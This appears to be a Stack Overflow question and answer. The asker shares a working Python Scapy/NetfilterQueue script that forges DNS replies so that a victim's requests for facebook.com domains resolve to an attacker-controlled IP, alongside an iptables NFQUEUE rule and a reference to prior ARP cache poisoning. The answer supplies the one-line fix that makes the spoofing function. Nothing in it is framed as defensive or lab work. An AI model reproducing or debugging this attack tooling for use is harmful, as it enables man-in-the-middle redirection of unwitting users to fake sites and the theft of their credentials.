# Python dns spoofing dont work nome not resolved

Tags: python, dns, scapy, arp

i don't know why mi script don't work, the victim browser shows : ERR: named not resolved.

My script

```
from scapy.all import *
from netfilterqueue import NetfilterQueue

spoofDomain = 'www.facebook.com'
spoofResolvedIp = '172.16.16.162'
queueId = 1

def dnsSpoof(packet):
        originalPayload = IP( packet.get_payload() )

        if not originalPayload.haslayer(DNSQR):
                # Not a dns query, accept and go on
                packet.accept()
        else:
                if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):
                        print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()

                        # Build the spoofed response
                        spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/\
                          UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/\
                          DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,\
                          an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))

                        print "Spoofing DNS response to: " + spoofedPayload.summary()
                        packet.set_payload(str(spoofedPayload))
                        packet.accept()
                        print "------------------------------------------"
                else:
                        # DNS query but not for target spoofDomain, accept and go on
                        packet.accept()

# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(queueId, dnsSpoof)

# wait for packets
try:
    nfqueue.run()
except KeyboardInterrupt:
    print('')

nfqueue.unbind()
```

I use iptables -t mangle -I FORWARD -p udp -j NFQUEUE --queue-num 1 command.

Firs i perform a man in the middle attack by ARP Cache spoofing. I used wireshark to see the traffic and it seems to be ok, I don't know whats is going on.

Comment: Hi ! Welcome to stackoverflow. Posting big scripts and asking for a wide unknown bug isn’t very attractive.. you should try to investigate first, show wireshark screenshots of what’s happening, logs... so that your issue is easier to help with

Answer (score 0):

I solved the problem, I was looking for queries I don't see that sorry

```
if not originalPayload.haslayer(DNSQR)
```

DNSQR is dns query, and I want to take dns answers, so the code is that:

```
if not originalPayload.haslayer(DNSRR)
```